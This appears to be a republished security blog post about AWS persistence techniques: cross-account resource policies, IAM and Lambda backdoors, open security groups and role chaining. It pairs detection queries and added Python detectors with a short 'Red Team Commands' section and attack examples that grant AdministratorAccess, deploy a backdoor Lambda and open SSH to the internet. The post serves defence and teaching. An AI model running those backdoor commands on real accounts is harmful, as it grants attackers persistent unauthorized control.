
In AWS, persistence techniques can be categorized into Data Access Persistence (r--) and Operational Control Persistence (rwx).
Data Access Persistence (Stealthy Data Exfiltration)
Attackers add their AWS account to resource-based policies (S3 Buckets, SNS Topics, SQS Queues) to maintain stealthy access to data.
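The defender's counterpart to this technique is to review every resource-based policy for principals that belong to accounts you do not own. The following is an added example (not part of the original post): it parses an S3 bucket policy document and reports Allow statements whose principal is a foreign account or the anonymous `*`. The account allowlist and the sample policy are constructed for the demonstration.

```python
"""Flag S3 bucket-policy statements that grant access to principals outside
the accounts we own. Added example; the allowlist and sample policy are
constructed, not taken from any real environment."""
import json

# Constructed assumption: the account IDs this organization owns.
OWN_ACCOUNTS = {"111111111111"}


def principal_accounts(principal):
    """Return the set of AWS account IDs named by a policy Principal element.
    A wildcard ('*' or {"AWS": "*"}) is returned as the literal '*' so that
    callers can flag anonymous access explicitly."""
    if principal == "*":
        return {"*"}
    aws = principal.get("AWS", []) if isinstance(principal, dict) else []
    if isinstance(aws, str):
        aws = [aws]
    accounts = set()
    for p in aws:
        if p == "*":
            accounts.add("*")
        elif p.startswith("arn:aws:iam::"):
            # arn:aws:iam::<account-id>:root / :user/... / :role/...
            accounts.add(p.split(":")[4])
        else:
            # Bare 12-digit account IDs, or an unrecognised form we still
            # want a human to look at.
            accounts.add(p)
    return accounts


def foreign_grants(policy_doc, own_accounts=OWN_ACCOUNTS):
    """Return (Sid, account) pairs for every Allow statement whose principal
    lies outside own_accounts. Deny statements are skipped: a Deny with
    Principal '*' is a hardening control, not a grant."""
    doc = json.loads(policy_doc) if isinstance(policy_doc, str) else policy_doc
    statements = doc.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be unwrapped
        statements = [statements]
    findings = []
    for st in statements:
        if st.get("Effect") != "Allow" or "Principal" not in st:
            continue
        for acct in sorted(principal_accounts(st["Principal"])):
            if acct not in own_accounts:
                findings.append((st.get("Sid", "<no Sid>"), acct))
    return findings


# Constructed sample: one in-house grant, one cross-account grant, one
# TLS-enforcing Deny that must not be reported.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "OwnAccountAccess", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "ForeignRead", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::999999999999:root"},
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-bucket",
                      "arn:aws:s3:::example-bucket/*"]},
        {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket/*",
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    ],
}

if __name__ == "__main__":
    for sid, acct in foreign_grants(SAMPLE_POLICY):
        print(f"statement {sid!r} grants access to foreign principal {acct}")
```

In practice the policy document comes from `aws s3api get-bucket-policy --bucket <name> --query Policy --output text`; the same parser applies to SNS topic and SQS queue policies, since they share the IAM policy grammar.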
Operational Control Persistence (Full Control Backdooring)
- Creating IAM users/roles
- Backdooring Lambda functions
- Modifying security groups
- Role Chain Juggling: Manipulating IAM roles that assume each other to maintain session persistence (max 60-minute sessions via STS AssumeRole).
You Should Know:
Detecting & Preventing AWS Persistence Attacks
1. Monitoring Unusual Cross-Account Access
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=PutBucketPolicy --region us-east-1
Defense:
- Enable AWS GuardDuty for anomaly detection.
- Use AWS Config to track S3 bucket policy changes.
2. Detecting IAM Backdoors
aws iam get-account-authorization-details --query 'UserDetailList[?contains(UserName, `backdoor`)]'
Defense:
- Implement IAM Access Analyzer to detect unintended permissions.
- Use CloudTrail logs to monitor
CreateUser,AttachUserPolicy.
3. Identifying Role Chain Juggling
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole --query 'Events[?contains(Resources[].ARN, `RoleA`)]'
Defense:
- Restrict role trust policies to specific ARNs, not wildcards ("Principal": { "AWS": "*" }).
- Set CloudWatch Alerts for repeated `AssumeRole` calls.
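The CloudTrail query above only finds individual AssumeRole events; role chain juggling shows up as the shape of the chain, not as any single call. The following added example (not from the original post) reconstructs assume-role chains from CloudTrail records by linking each AssumeRole event to the session that made it, then flags chains that revisit a role or exceed a depth threshold. The events are constructed samples in the CloudTrail record format; the account ID, role and user names are placeholders.

```python
"""Reconstruct STS AssumeRole chains from CloudTrail records and flag
role chain juggling. Added example with constructed sample events."""


def _role_of_arn(arn):
    """Split a caller or target ARN into (role-or-principal name, session).
    arn:aws:sts::<acct>:assumed-role/RoleA/sess  -> ("RoleA", "sess")
    arn:aws:iam::<acct>:role/path/RoleB          -> ("RoleB", None)
    anything else (IAM user, root)               -> (resource part, None)"""
    resource = arn.split(":", 5)[5]
    parts = resource.split("/")
    if parts[0] == "assumed-role":
        return parts[1], parts[2]
    if parts[0] == "role":
        return parts[-1], None
    return resource, None


def assume_role_chains(events):
    """Map (role, roleSessionName) -> chain of hops from the original
    principal to that session. Events may arrive in any order; they are
    sorted by eventTime (ISO-8601 strings sort chronologically)."""
    chains = {}
    for e in sorted(events, key=lambda e: e["eventTime"]):
        if e.get("eventSource") != "sts.amazonaws.com" or e.get("eventName") != "AssumeRole":
            continue
        ident = e["userIdentity"]
        params = e["requestParameters"]
        target_role, _ = _role_of_arn(params["roleArn"])
        session = params["roleSessionName"]
        if ident.get("type") == "AssumedRole":
            # The caller is itself a role session: extend that session's chain.
            caller_role, caller_sess = _role_of_arn(ident["arn"])
            base = chains.get((caller_role, caller_sess), [caller_role])
        else:
            base = [ident.get("arn", ident.get("type", "unknown"))]
        chains[(target_role, session)] = base + [target_role]
    return chains


def find_juggling(events, max_depth=2):
    """Return findings as (kind, role, session, chain). 'circular' means a
    role appears twice in its own chain; 'deep' means more than max_depth
    role hops from the original principal."""
    findings = []
    for (role, sess), chain in assume_role_chains(events).items():
        roles = chain[1:]  # drop the originating principal
        if len(set(roles)) < len(roles):
            findings.append(("circular", role, sess, chain))
        elif len(roles) > max_depth:
            findings.append(("deep", role, sess, chain))
    return findings


def _event(time, ident_type, ident_arn, role_arn, session):
    """Build a minimal CloudTrail AssumeRole record (constructed sample)."""
    return {"eventTime": time, "eventSource": "sts.amazonaws.com",
            "eventName": "AssumeRole",
            "userIdentity": {"type": ident_type, "arn": ident_arn},
            "requestParameters": {"roleArn": role_arn, "roleSessionName": session}}


ACCT = "111111111111"  # placeholder account ID
SAMPLE_EVENTS = [
    _event("2024-01-01T10:00:00Z", "IAMUser", f"arn:aws:iam::{ACCT}:user/alice",
           f"arn:aws:iam::{ACCT}:role/RoleA", "s1"),
    _event("2024-01-01T10:05:00Z", "AssumedRole", f"arn:aws:sts::{ACCT}:assumed-role/RoleA/s1",
           f"arn:aws:iam::{ACCT}:role/RoleB", "s2"),
    _event("2024-01-01T10:50:00Z", "AssumedRole", f"arn:aws:sts::{ACCT}:assumed-role/RoleB/s2",
           f"arn:aws:iam::{ACCT}:role/RoleA", "s3"),  # RoleB hops back to RoleA
    _event("2024-01-01T11:00:00Z", "IAMUser", f"arn:aws:iam::{ACCT}:user/bob",
           f"arn:aws:iam::{ACCT}:role/RoleC", "s4"),  # ordinary single hop
]

if __name__ == "__main__":
    for kind, role, sess, chain in find_juggling(SAMPLE_EVENTS):
        print(f"{kind}: {role}/{sess} via {' -> '.join(chain)}")
```

Feeding this the output of `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole` (each `CloudTrailEvent` field is a JSON string to be decoded first) turns the raw event list into a per-session view; the `max_depth` threshold is a tuning knob, since legitimate automation often chains two roles but rarely more.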
4. Backdooring Lambda for Persistence
aws lambda update-function-code --function-name MyFunction --zip-file fileb://malicious.zip
Defense:
- Enable Lambda Code Signing.
- Monitor unexpected Lambda code updates via CloudTrail.
5. Security Group Manipulation
aws ec2 authorize-security-group-ingress --group-id sg-123456 --protocol tcp --port 22 --cidr 0.0.0.0/0
Defense:
- Use AWS Security Hub to detect open security groups.
- Enforce least privilege via SCP (Service Control Policies).
What Undercode Says:
AWS persistence attacks are evolving—focus on detecting stealthy data access (S3 policies) and operational control (IAM, Lambda, Role Chaining).
Key Commands for Blue Teams:
Check recent IAM changes
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=CreateUser
Detect public S3 buckets
aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\t' '\n' | xargs -I {} aws s3api get-bucket-acl --bucket {}
Find roles whose trust policy allows any AWS principal (wildcard trusts are the raw material for role chaining)
aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument.Statement[?Principal.AWS==`*`]]'
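A single JMESPath filter can surface wildcard trusts, but genuinely circular trusts (RoleA trusts RoleB and RoleB trusts RoleA) require walking the trust relationships as a graph. The following added example (not from the original post) takes the role list in the shape `aws iam list-roles` returns, builds a "can assume" graph from each role's trust policy, and reports both wildcard trusts and cycles. The roles and account ID are constructed.

```python
"""Find circular and wildcard role trusts from `aws iam list-roles` output.
Added example; the role list below is constructed."""


def trusted_principals(trust_doc):
    """Yield every AWS principal that an Allow statement in a role trust
    policy permits to assume the role."""
    stmts = trust_doc.get("Statement", [])
    if isinstance(stmts, dict):
        stmts = [stmts]
    for st in stmts:
        if st.get("Effect") != "Allow":
            continue
        p = st.get("Principal", {})
        aws = p if isinstance(p, str) else p.get("AWS", [])
        if isinstance(aws, str):
            aws = [aws]
        yield from aws


def trust_graph(roles):
    """Return (graph, wildcard_roles). graph maps a role name to the set of
    roles it can assume; a principal that is not one of our roles (account
    root, users, foreign accounts) creates no edge but '*' is recorded."""
    by_arn = {r["Arn"]: r["RoleName"] for r in roles}
    graph = {r["RoleName"]: set() for r in roles}
    wildcard = []
    for r in roles:
        for p in trusted_principals(r["AssumeRolePolicyDocument"]):
            if p == "*":
                wildcard.append(r["RoleName"])
            elif p in by_arn:
                graph[by_arn[p]].add(r["RoleName"])  # trusted role -> can assume -> this role
    return graph, wildcard


def find_cycles(graph):
    """Depth-first search for cycles; each cycle is reported once, rotated
    to start at its lexicographically smallest role name."""
    cycles = set()

    def dfs(node, path, on_path):
        for nxt in sorted(graph.get(node, ())):
            if nxt in on_path:
                cyc = path[path.index(nxt):]
                i = cyc.index(min(cyc))
                cycles.add(tuple(cyc[i:] + cyc[:i]))
            else:
                dfs(nxt, path + [nxt], on_path | {nxt})

    for start in graph:
        dfs(start, [start], {start})
    return sorted(cycles)


def _role(name, principal, acct="111111111111"):
    """Construct one role record in list-roles shape (placeholder account)."""
    return {"RoleName": name, "Arn": f"arn:aws:iam::{acct}:role/{name}",
            "AssumeRolePolicyDocument": {"Version": "2012-10-17", "Statement": [
                {"Effect": "Allow", "Principal": {"AWS": principal},
                 "Action": "sts:AssumeRole"}]}}


SAMPLE_ROLES = [
    _role("RoleA", "arn:aws:iam::111111111111:role/RoleB"),   # A trusts B
    _role("RoleB", "arn:aws:iam::111111111111:role/RoleA"),   # B trusts A: a cycle
    _role("RoleC", "*"),                                       # wildcard trust
    _role("RoleD", "arn:aws:iam::111111111111:root"),          # account root, no edge
]

if __name__ == "__main__":
    g, wild = trust_graph(SAMPLE_ROLES)
    print("wildcard trusts:", wild)
    print("circular trusts:", find_cycles(g))
```

Pipe `aws iam list-roles --output json` into `trust_graph` (the CLI already URL-decodes `AssumeRolePolicyDocument`); in large accounts the DFS is fine because trust graphs are sparse, but `Condition` keys (for example `sts:ExternalId`) are deliberately ignored here and should be reviewed by hand.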
Red Team Commands:
Backdoor an IAM Role
aws iam attach-role-policy --role-name TargetRole --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
Maintain Lambda persistence
aws lambda create-function --function-name PersistBackdoor --runtime python3.8 --role arn:aws:iam::123456789012:role/lambda-exec --handler lambda_function.handler --code S3Bucket=malicious-bucket,S3Key=backdoor.zip
Expected Output:
- Detection Alerts for unusual `AssumeRole` chains.
- CloudTrail logs revealing IAM backdoors.
- S3 Bucket Policies modified for cross-account access.
Prediction:
AWS persistence techniques will shift towards serverless (Lambda, Step Functions) and cross-account deception, requiring more advanced behavioral analytics for detection.
Reference:
Reported By: Activity 7337709583387262978 – Hackers Feeds